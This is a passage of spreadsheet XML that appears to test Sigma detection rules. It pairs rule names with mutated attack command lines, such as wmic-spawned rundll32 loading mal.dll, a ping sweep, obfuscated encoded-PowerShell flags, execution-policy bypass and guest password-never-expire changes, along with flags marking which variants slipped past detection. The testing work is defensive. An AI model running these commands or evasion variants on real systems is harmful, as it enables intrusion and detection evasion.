    <row r="4103" ht="15.75" customHeight="1" s="42">
      <c r="A4103" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4103" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4103" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4103" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4103" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F4103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4103" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4103" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4103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103" s="43" t="n"/>
      <c r="K4103" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4104" ht="15.75" customHeight="1" s="42">
      <c r="A4104" s="43" t="inlineStr">
        <is>
          <t>t1114</t>
        </is>
      </c>
      <c r="B4104" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C4104" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D4104" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E4104" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F4104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4104" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4104" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4104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4104" s="43" t="n"/>
      <c r="K4104" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4105" ht="15.75" customHeight="1" s="42">
      <c r="A4105" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B4105" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_network_scan_loop</t>
        </is>
      </c>
      <c r="C4105" s="43" t="inlineStr">
        <is>
          <t>Suspicious Scan Loop Network</t>
        </is>
      </c>
      <c r="D4105" s="43" t="inlineStr">
        <is>
          <t>f8ad2e2c-40b6-4117-84d7-20b89896ab23</t>
        </is>
      </c>
      <c r="E4105" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "f^o^r /L %i in (1,1,254) do p^i^n^g -n 1 192.168.1.%i"</t>
        </is>
      </c>
      <c r="F4105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4105" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4105" s="43" t="n"/>
      <c r="J4105" s="43" t="n"/>
      <c r="K4105" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4106" ht="15.75" customHeight="1" s="42">
      <c r="A4106" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4106" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4106" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4106" s="43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F4106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4106" s="43" t="n"/>
      <c r="J4106" s="43" t="n"/>
      <c r="K4106" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4107" ht="15.75" customHeight="1" s="42">
      <c r="A4107" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4107" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4107" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4107" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4107" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I410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107" s="43" t="n"/>
      <c r="K4107" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4108" ht="15.75" customHeight="1" s="42">
      <c r="A4108" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4108" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4108" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4108" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4108" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4108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108" s="43" t="n"/>
      <c r="K4108" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4109" ht="15.75" customHeight="1" s="42">
      <c r="A4109" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4109" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4109" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4109" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4109" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eNCoDEdcomMAnD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4109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109" s="43" t="n"/>
      <c r="K4109" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4110" ht="15.75" customHeight="1" s="42">
      <c r="A4110" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4110" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4110" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4110" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4110" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4110" s="43" t="n"/>
      <c r="J4110" s="43" t="n"/>
      <c r="K4110" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4111" ht="15.75" customHeight="1" s="42">
      <c r="A4111" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4111" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4111" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4111" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4111" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4111" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4111" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4111" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4111" s="43" t="n"/>
      <c r="J4111" s="43" t="n"/>
      <c r="K4111" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4112" ht="15.75" customHeight="1" s="42">
      <c r="A4112" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4112" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4112" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4112" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4112" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncOdEdcoMManD JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4112" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4112" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4112" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4112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112" s="43" t="n"/>
      <c r="K4112" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4113" ht="15.75" customHeight="1" s="42">
      <c r="A4113" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4113" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4113" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4113" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4113" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncoDEDcommaND JABzID0gJ2pvaW4nOyAkcyArPSAnc3BsaXQnOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F4113" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4113" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4113" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I411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113" s="43" t="n"/>
      <c r="K4113" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4114" ht="15.75" customHeight="1" s="42">
      <c r="A4114" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4114" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4114" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4114" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4114" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[char[]](https://www.google.com/search?q=106,111,105,110) -join ''"</t>
        </is>
      </c>
      <c r="F4114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4114" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4114" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4114" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J4114" s="43" t="n"/>
      <c r="K4114" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4115" ht="15.75" customHeight="1" s="42">
      <c r="A4115" s="43" t="inlineStr">
        <is>
          <t>t1027.005</t>
        </is>
      </c>
      <c r="B4115" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C4115" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D4115" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E4115" s="43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4115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4115" s="43" t="n"/>
      <c r="J4115" s="43" t="n"/>
      <c r="K4115" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4116" ht="15.75" customHeight="1" s="42">
      <c r="A4116" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4116" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4116" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4116" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4116" s="43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4116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4116" s="43" t="n"/>
      <c r="J4116" s="43" t="n"/>
      <c r="K4116" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4117" ht="15.75" customHeight="1" s="42">
      <c r="A4117" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4117" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4117" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4117" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4117" s="43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4117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4117" s="43" t="n"/>
      <c r="J4117" s="43" t="n"/>
      <c r="K4117" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4118" ht="15.75" customHeight="1" s="42">
      <c r="A4118" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B4118" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C4118" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D4118" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E4118" s="43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4118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4118" s="43" t="n"/>
      <c r="J4118" s="43" t="n"/>
      <c r="K4118" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4119" ht="15.75" customHeight="1" s="42">
      <c r="A4119" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4119" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C4119" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D4119" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E4119" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F4119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4119" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4119" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4119" s="43" t="n"/>
      <c r="K4119" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4120" ht="15.75" customHeight="1" s="42">
      <c r="A4120" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4120" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4120" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4120" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4120" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOp -noNi /"w" 1 -ExeC bypass -c "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4120" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4120" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4120" s="43" t="n"/>
      <c r="K4120" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4121" ht="15.75" customHeight="1" s="42">
      <c r="A4121" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4121" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4121" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4121" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4121" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"nop" -noni -w 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4121" s="43" t="n"/>
      <c r="J4121" s="43" t="n"/>
      <c r="K4121" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4122" ht="15.75" customHeight="1" s="42">
      <c r="A4122" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4122" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4122" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4122" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4122" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -nONI -w 1 -"exec" bypass -C "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4122" s="43" t="n"/>
      <c r="J4122" s="43" t="n"/>
      <c r="K4122" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4123" ht="15.75" customHeight="1" s="42">
      <c r="A4123" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4123" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4123" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4123" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4123" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noni -W 1 /"exec" bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4123" s="43" t="n"/>
      <c r="J4123" s="43" t="n"/>
      <c r="K4123" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4124" ht="15.75" customHeight="1" s="42">
      <c r="A4124" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4124" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4124" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4124" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4124" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -noNI /"w" 1 /"exec" bypass /"c" "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4124" s="43" t="n"/>
      <c r="J4124" s="43" t="n"/>
      <c r="K4124" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4125" ht="15.75" customHeight="1" s="42">
      <c r="A4125" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4125" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4125" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4125" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4125" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" -noni -w 1 -eXeC bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4125" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4125" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4125" s="43" t="n"/>
      <c r="K4125" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4126" ht="15.75" customHeight="1" s="42">
      <c r="A4126" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4126" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_execution_patterns</t>
        </is>
      </c>
      <c r="C4126" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec Execution Patterns</t>
        </is>
      </c>
      <c r="D4126" s="43" t="inlineStr">
        <is>
          <t>058f4380-962d-40a5-afce-50207d36d7e2</t>
        </is>
      </c>
      <c r="E4126" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"nop" /"noni" -w 1 -exec bypass -Command "Write-Host 'Test'"</t>
        </is>
      </c>
      <c r="F4126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4126" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I4126" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J4126" s="43" t="n"/>
      <c r="K4126" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4127" ht="15.75" customHeight="1" s="42">
      <c r="A4127" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4127" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4127" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4127" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4127" s="43" t="inlineStr">
        <is>
          <t>wmic useraccount where name='guest' set passwordexpires=0</t>
        </is>
      </c>
      <c r="F4127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4127" s="43" t="n"/>
      <c r="J4127" s="43" t="n"/>
      <c r="K4127" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4128" ht="15.75" customHeight="1" s="42">
      <c r="A4128" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4128" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4128" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4128" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4128" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4128" s="43" t="n"/>
      <c r="J4128" s="43" t="n"/>
      <c r="K4128" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4129" ht="15.75" customHeight="1" s="42">
      <c r="A4129" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4129" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4129" s="43" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D4129" s="43" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E4129" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAND "Get-WmiObject -Class Win32_UserAccount -Filter " Name='guest'" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F4129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G4129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H4129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I4129" s="43" t="n"/>
      <c r="J4129" s="43" t="n"/>
      <c r="K4129" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4130" ht="15.75" customHeight="1" s="42">
      <c r="A4130" s="43" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B4130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C4130" s="43" t="inlineStr">
